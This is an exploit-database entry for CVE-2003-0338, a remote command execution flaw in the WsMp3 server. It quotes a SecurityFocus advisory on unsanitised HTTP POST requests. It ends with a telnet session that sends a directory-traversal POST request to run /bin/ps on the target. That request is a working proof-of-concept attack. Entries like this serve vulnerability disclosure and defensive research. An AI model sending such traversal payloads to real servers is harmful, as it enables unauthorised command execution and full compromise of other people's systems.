WSMP3 0.0.x - Remote Command Execution
| EKU-ID: 28099 | CVE: CVE-2003-0338;OSVDB-8440 | OSVDB-ID: |
| Author: dong-h0un U | Published: 2003-05-21 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28099 | CVE: CVE-2003-0338;OSVDB-8440 | OSVDB-ID: |
| Author: dong-h0un U | Published: 2003-05-21 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7645/info A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP POST requests. As a result, an attacker may be capable of executing arbitrary files on a target system. This may lead to the complete compromise of a target system. bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. POST /dir/../../../../../../bin/ps HTTP/1.0